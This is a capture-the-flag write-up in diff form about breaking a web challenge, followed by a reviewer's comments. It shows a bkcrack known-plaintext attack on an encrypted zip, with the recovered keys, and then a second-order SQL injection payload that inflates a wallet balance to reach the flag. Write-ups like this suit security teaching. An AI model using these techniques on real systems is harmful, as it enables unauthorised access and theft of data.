| 1 | +## Rich Project |
| 2 | + |
| 3 | +We are given a link to a website. One of the first things we do is check for a robots.txt and we find: |
| 4 | + |
| 5 | +``` |
| 6 | +User-agent : * |
| 7 | +Disallow: /top_secret.zip |
| 8 | +Disallow: / |
| 9 | +``` |
| 10 | + |
| 11 | +We download and try to extract top\_secret.zip but it is encrypted. We can see the filenames though: |
| 12 | + |
| 13 | +``` |
| 14 | +Archive: top_secret.zip |
| 15 | + Length Method Size Cmpr Date Time CRC-32 Name |
| 16 | +-------- ------ ------- ---- ---------- ----- -------- ---- |
| 17 | + 0 Stored 0 0% 01-26-2019 19:31 00000000 __SECRET__/ |
| 18 | + 133 Defl:N 112 16% 01-15-2019 15:53 d2af9447 __SECRET__/flag.php |
| 19 | + 674 Defl:N 340 50% 01-15-2019 17:29 060ffd05 __SECRET__/pricemaker.php |
| 20 | + 0 Stored 0 0% 01-26-2019 19:31 00000000 html/ |
| 21 | + 1506 Defl:N 720 52% 01-26-2019 19:34 47f09190 html/bbs.php |
| 22 | + 1019 Defl:N 526 48% 01-26-2019 19:32 1e4e97d7 html/buy.php |
| 23 | + 0 Stored 0 0% 01-26-2019 19:31 00000000 html/css/ |
| 24 | + 117418 Defl:N 19237 84% 06-12-2018 22:30 3d3550ff html/css/bootstrap.min.css |
| 25 | + 2538 Defl:N 915 64% 01-02-2019 11:26 142a9253 html/css/carousel.css |
| 26 | + 767 Defl:N 291 62% 01-02-2019 14:27 46d946c8 html/css/signin.css |
| 27 | + 201 Defl:N 128 36% 01-15-2019 16:07 27d027b0 html/dbconn.php |
| 28 | + 233 Defl:N 116 50% 01-15-2019 15:42 33a8cd28 html/footer.php |
| 29 | + 1903 Defl:N 713 63% 01-15-2019 16:54 92a27374 html/header.php |
| 30 | + 2656 Defl:N 694 74% 01-15-2019 15:25 3858ab6a html/home.php |
| 31 | + 0 Stored 0 0% 01-26-2019 19:31 00000000 html/images/ |
| 32 | + 133008 Defl:N 132951 0% 01-02-2019 09:22 652cae0e html/images/buy.png |
| 33 | + 12830 Defl:N 12814 0% 01-02-2019 09:41 0d669505 html/images/JB.jpg |
| 34 | + 40394 Defl:N 39571 2% 05-19-2010 11:36 d28f29f5 html/images/rich.jpg |
| 35 | + 1237 Defl:N 257 79% 01-15-2019 16:54 c5b2e10d html/index.php |
| 36 | + 947 Defl:N 501 47% 01-15-2019 15:32 b2c38c37 html/info.php |
| 37 | + 0 Stored 0 0% 01-26-2019 19:31 00000000 html/js/ |
| 38 | + 35652 Defl:N 9460 74% 06-12-2018 22:30 470f81a5 html/js/bootstrap.min.js |
| 39 | + 456243 Defl:N 93095 80% 11-18-2018 02:40 7ceb90fa html/js/canvasjs.min.js |
| 40 | + 305436 Defl:N 104987 66% 01-04-2019 10:00 cebd2607 html/js/echarts.simple.min.js |
| 41 | + 23861 Defl:N 8680 64% 06-12-2018 22:30 e8b790fb html/js/holder.js |
| 42 | + 2132 Defl:N 1021 52% 06-12-2018 22:30 d57479a3 html/js/ie-emulation-modes-warning.js |
| 43 | + 694 Defl:N 426 39% 06-12-2018 22:30 53fa6dd1 html/js/ie10-viewport-bug-workaround.js |
| 44 | + 95931 Defl:N 33303 65% 12-21-2016 03:17 8210596f html/js/jquery.min.js |
| 45 | + 1389 Defl:N 636 54% 01-15-2019 17:26 177d2eef html/login.php |
| 46 | + 71 Defl:N 67 6% 01-15-2019 15:30 93b3559e html/logout.php |
| 47 | + 3464 Defl:N 1287 63% 01-15-2019 15:45 9fc79ea3 html/market.php |
| 48 | + 366 Defl:N 272 26% 01-15-2019 15:48 dfdc5c33 html/pay.php |
| 49 | + 998 Defl:N 505 49% 01-15-2019 16:01 3a666b07 html/read.php |
| 50 | + 1675 Defl:N 769 54% 01-15-2019 16:03 87a85006 html/reg.php |
| 51 | + 922 Defl:N 525 43% 01-26-2019 20:30 7b23d9ce html/reserv.php |
| 52 | + 53 Defl:N 45 15% 01-10-2019 10:05 babd12ec html/robots.txt |
| 53 | + 977 Defl:N 498 49% 01-26-2019 19:32 4c6497e0 html/sell.php |
| 54 | + 1235 Defl:N 567 54% 01-15-2019 15:48 8050f721 html/write.php |
| 55 | + 0 Stored 0 0% 01-15-2019 16:55 00000000 ZIP PASS = MASTER_PW |
| 56 | +-------- ------- --- ------- |
| 57 | + 1248563 466029 63% 39 files |
| 58 | +``` |
| 59 | + |
| 60 | +This indicates that there is a master password somewhere which will give us the zip password. But we can also see that it contains html/js/\* which likely is the same contents as the files under js/ on the live server. This allows us to attempt to break the ZIP encryption using a known plaintext attack with bkcrack ([https://github.com/kimci86/bkcrack](https://github.com/kimci86/bkcrack)). It is important that when we generate the plaintext zip file containing the unencrypted, compressed ie10-viewport-bug-workaround.js, that its compressed size matches the compressed size in top\_secret.zip. If the compressed sizes do not match, then the data is different and the attack will not work. |
| 61 | + |
| 62 | +``` |
| 63 | +$ wget http://110.10.147.112/js/ie10-viewport-bug-workaround.js |
| 64 | +$ wget http://110.10.147.112/top_secret.zip |
| 65 | +$ zip pt.zip ie10-viewport-bug-workaround.js |
| 66 | +$ src/bkcrack -C top_secret.zip -c html/js/ie10-viewport-bug-workaround.js -P pt.zip -p ie10-viewport-bug-workaround.js |
| 67 | +Generated 4194304 Z values. |
| 68 | +[17:53:19] Z reduction using 414 extra bytes of known plaintext |
| 69 | +100.0 % (414 / 414) |
| 70 | +22536 values remaining. |
| 71 | +[17:53:22] Attack on 22536 Z values at index 13 |
| 72 | +10.6 % (2396 / 22536) |
| 73 | +[17:53:51] Keys |
| 74 | +c9a99496 d9c6d6fe 75590659 |
| 75 | +``` |
| 76 | + |
| 77 | +Now we can decrypt the files in the ZIP file: |
| 78 | + |
| 79 | +``` |
| 80 | +$ src/bkcrack -C top_secret.zip -c __SECRET__/flag.php -k c9a99496 d9c6d6fe 75590659 -d flag.php |
| 81 | +[17:56:45] Keys |
| 82 | +c9a99496 d9c6d6fe 75590659 |
| 83 | +Wrote deciphered text. |
| 84 | +$ ../tools/inflate.py < flag.php |
| 85 | +<?php |
| 86 | + $key= "D0_N0T_RE1E@5E_0THER5"; |
| 87 | + $FLAG = "##########" |
| 88 | + if($_GET['key'] === $key) |
| 89 | + die($FLAG); |
| 90 | + else |
| 91 | + die("who you are?"); |
| 92 | +?> |
| 93 | +``` |
| 94 | + |
| 95 | +We analyzed the other PHP files in the ZIP. We can see that pay.php will include flag.php if we have enouch gold: |
| 96 | + |
| 97 | +``` |
| 98 | +<div class="container" style="margin-top:120px"> |
| 99 | +<?php |
| 100 | + if(!isset($_SESSION['ID'])) |
| 101 | + die('login first'); |
| 102 | + $conn = dbconn('tradedata'); |
| 103 | + $q = "SELECT * FROM user_wallet where id='{$_SESSION['ID']}'"; |
| 104 | + $res = mysqli_query($conn,$q); |
| 105 | + $row = mysqli_fetch_array($res); |
| 106 | + if($row['cash'] <999999999) |
| 107 | + die("Not enough gold"); |
| 108 | + else |
| 109 | + include '../__SECRET__/flag.php'; |
| 110 | +?> |
| 111 | +``` |
| 112 | + |
| 113 | +One way to easily have enough gold is if we can inject into the SQL query using the ID field in the session. As we can see from login.php, the ID field comes directly from the database and is not escaped: |
| 114 | + |
| 115 | +``` |
| 116 | +... |
| 117 | + $q = "SELECT * FROM users where id='{$ID}' and pw='{$PW}' and ac='{$AC}'"; |
| 118 | + $res = mysqli_query($conn,$q); |
| 119 | + $row = mysqli_fetch_array($res); |
| 120 | + if($row != NULL) |
| 121 | + { |
| 122 | + $_SESSION['ID'] = strtolower($row['id']); |
| 123 | + header("Location: ./?p=main"); |
| 124 | + die(""); |
| 125 | + } |
| 126 | +... |
| 127 | +``` |
| 128 | + |
| 129 | +Unfortunately, the id field in the database is quite small (maybe 32 bytes), so our SQL injection needs to also be small. We ended up with the following query: |
| 130 | + |
| 131 | +``` |
| 132 | +azz' union select 1,1e10,1,1,1 # |
| 133 | +``` |
| 134 | + |
| 135 | +After registering a user with this ID, logging out, and login with this ID, we can visit /pay.php with the correct key parameter to get the flag. |
| 136 | + |
| 137 | + |
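Review bot: the SQL injection step ("We ended up with the following query: azz' union select 1,1e10,1,1,1 #") does not say why that payload satisfies pay.php. From the visible code, pay.php runs `SELECT * FROM user_wallet where id='{$_SESSION['ID']}'` and checks `$row['cash'] < 999999999`, so the union row has to match the column count of `user_wallet` (five here) and `1e10` has to sit in the position of the `cash` column (second) for the check to pass; `1e10` is also shorter than writing the digits out, which matters given the roughly 32-byte `id` column mentioned. One sentence stating that assumed column layout would make the step reproducible rather than a magic string. Minor: "if we have enouch gold" should read "enough gold", and "logging out, and login with this ID" should read "logging out, and logging in with this ID". Also, in the decrypted flag.php the line `$FLAG = "##########"` has no trailing semicolon; if that is a transcription slip rather than the real file content it is worth correcting, since as shown the snippet is not valid PHP.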